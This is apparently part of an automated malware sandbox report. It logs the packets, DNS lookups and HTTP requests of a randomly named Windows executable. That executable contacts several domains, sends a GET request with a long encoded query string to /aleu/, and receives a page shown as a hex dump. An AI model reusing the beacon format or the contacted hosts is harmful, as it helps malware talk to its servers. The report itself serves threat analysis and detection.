                                                                                                                                      Apr 17, 2024 08:39:53.867856026 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.867887020 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.867904902 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868591070 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868643045 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868709087 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:55.172714949 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.191437006 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.402036905 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.402249098 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.404712915 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.615792036 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.615859985 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.616126060 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.619230032 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.829569101 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.211746931 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.439372063 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.439493895 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.441390991 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.669162989 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673566103 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673609018 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673650026 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673691988 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673727989 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673764944 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673800945 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673796892 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673796892 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673835039 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673851013 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673880100 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:04.494103909 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.504121065 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.729444027 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.729767084 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.731841087 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.957132101 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962671995 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962727070 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962745905 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962779999 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962798119 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962820053 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962836027 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962953091 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962970972 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962979078 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.963071108 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.963071108 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:07.235204935 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.253855944 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.482924938 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.483092070 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.485328913 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.714374065 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714431047 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714462042 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714492083 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714521885 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714550972 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714581966 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714612007 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714643955 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719783068 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719821930 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719861031 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719897032 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719909906 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.719935894 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719966888 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.719974041 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720010042 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720021009 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.720046043 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720097065 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.720097065 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720164061 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:10.000710964 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.019171000 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.244004965 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.244088888 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.246309996 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.471049070 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477191925 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477212906 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477241993 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477261066 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477277994 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477296114 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477313042 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477324963 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.477329969 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477355003 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477417946 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.477435112 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.481708050 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.706454039 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.031116962 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.327920914 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.328006983 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.624380112 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.624408007 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.624490976 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.625899076 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.625956059 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:18.845427036 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:19.862831116 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:20.160801888 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.160893917 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:20.458161116 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.458194971 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.458213091 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.458267927 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:20.458267927 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:21.672450066 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:22.691046953 CEST4975480192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:22.987601995 CEST804975452.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:22.987703085 CEST4975480192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:23.285502911 CEST804975452.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:23.285527945 CEST804975452.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:23.285541058 CEST804975452.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:23.285593987 CEST4975480192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:24.500711918 CEST4975480192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:25.520131111 CEST4975580192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:25.817878008 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:25.819255114 CEST4975580192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:26.116575003 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:26.116653919 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:26.116789103 CEST4975580192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:26.117449045 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:26.123218060 CEST4975580192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:31.555037975 CEST4975680192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:31.784190893 CEST8049756178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:31.784414053 CEST4975680192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:31.789032936 CEST4975680192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:32.018208027 CEST8049756178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:32.019088030 CEST8049756178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:32.019315958 CEST8049756178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:32.019443035 CEST4975680192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:33.141088009 CEST4975580192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:33.297399998 CEST4975680192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:33.437959909 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:34.319048882 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:34.540489912 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:34.541464090 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:34.545046091 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:34.766333103 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:34.767100096 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:34.767167091 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:34.767235994 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:36.047461033 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:37.070210934 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:37.296869040 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.297024965 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:37.377230883 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:37.602564096 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.602585077 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.603017092 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.603390932 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.603413105 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:37.603502035 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:37.646388054 CEST804975552.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:39.876971006 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:40.893958092 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:41.119246960 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:41.119368076 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:41.121134996 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:41.346262932 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:41.347449064 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:41.347510099 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:41.347960949 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:41.350995064 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                      Apr 17, 2024 08:40:41.575992107 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:46.930907965 CEST4976080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:40:47.142455101 CEST804976091.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:47.142955065 CEST4976080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:40:47.145229101 CEST4976080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:40:47.357666969 CEST804976091.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:47.357734919 CEST804976091.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:47.358938932 CEST4976080192.168.2.491.195.240.117

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 17, 2024 08:39:16.577898026 CEST4963353192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:39:16.925314903 CEST53496331.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:34.006190062 CEST5873053192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:39:34.137873888 CEST53587301.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:47.785605907 CEST6500653192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:39:47.969681978 CEST53650061.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:01.629410982 CEST6289953192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:40:02.209013939 CEST53628991.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:16.488426924 CEST6066153192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:40:17.028501034 CEST53606611.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:31.129395008 CEST6006253192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:40:31.551970005 CEST53600621.1.1.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:46.675429106 CEST5814953192.168.2.41.1.1.1
                                                                                                                                      Apr 17, 2024 08:40:46.928514957 CEST53581491.1.1.1192.168.2.4

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Apr 17, 2024 08:39:16.577898026 CEST192.168.2.41.1.1.10x5d42Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:39:34.006190062 CEST192.168.2.41.1.1.10x650cStandard query (0)www.choosejungmann.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:39:47.785605907 CEST192.168.2.41.1.1.10xd729Standard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:01.629410982 CEST192.168.2.41.1.1.10xc74dStandard query (0)www.colchondealquiler.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:16.488426924 CEST192.168.2.41.1.1.10x3317Standard query (0)www.www60270.xyzA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:31.129395008 CEST192.168.2.41.1.1.10x4ab6Standard query (0)www.skibinscy-finanse.plA (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:46.675429106 CEST192.168.2.41.1.1.10xe621Standard query (0)www.avoshield.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Apr 17, 2024 08:39:16.925314903 CEST1.1.1.1192.168.2.40x5d42No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:39:34.137873888 CEST1.1.1.1192.168.2.40x650cNo error (0)www.choosejungmann.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:39:47.969681978 CEST1.1.1.1192.168.2.40xd729No error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:02.209013939 CEST1.1.1.1192.168.2.40xc74dNo error (0)www.colchondealquiler.com217.76.128.34A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:17.028501034 CEST1.1.1.1192.168.2.40x3317No error (0)www.www60270.xyzfix01.pfw.djamxtvyk.cloudland3.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:17.028501034 CEST1.1.1.1192.168.2.40x3317No error (0)fix01.pfw.djamxtvyk.cloudland3.com52.175.38.24A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:31.551970005 CEST1.1.1.1192.168.2.40x4ab6No error (0)www.skibinscy-finanse.pl178.211.137.59A (IP address)IN (0x0001)false
                                                                                                                                      Apr 17, 2024 08:40:46.928514957 CEST1.1.1.1192.168.2.40xe621No error (0)www.avoshield.com91.195.240.117A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • www.maxiwalls.com
                                                                                                                                      • www.choosejungmann.com
                                                                                                                                      • www.paydayloans3.shop
                                                                                                                                      • www.colchondealquiler.com
                                                                                                                                      • www.skibinscy-finanse.pl
                                                                                                                                      • www.avoshield.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.44973879.98.25.1802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:17.162070990 CEST468OUTGET /aleu/?QbZ=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.maxiwalls.com
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Apr 17, 2024 08:39:17.389969110 CEST1289INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 17 Apr 2024 06:39:17 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Cache-control: max-age=300
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Length: 5662
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 6d 61 78 69 77 61 6c 6c 73 2e 63 6f 6d 20 2d 20 55 c5 be 72 65 67 69 73 74 72 75 6f 74 61 73 20 64 6f 6d 65 6e 61 73 20 2d 20 49 6e 74 65 72 6e 65 74 6f 20 76 69 7a 69 6a 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 3c 2f 68 65 61 64 3e 0d 0a 20 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 20 20 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a 20 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 68 65 61 64 65 72 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 37 36 38 20 68 65 69 67 68 74 3d 31 30 30 20 73 63 72 6f 6c 6c 69 6e 67 3d 6e 6f 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 3c 74 72 3e 3c 74 64 20 68 65 69 67 68 74 3d 32 34 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0d 0a 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 3c 21 2d 2d 20 65 6e 64 20 68 65 61 64 65 72 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 62 65 67 69 6e 20 62 6f 64 79 20 2d 2d 3e 0d 0a 0d
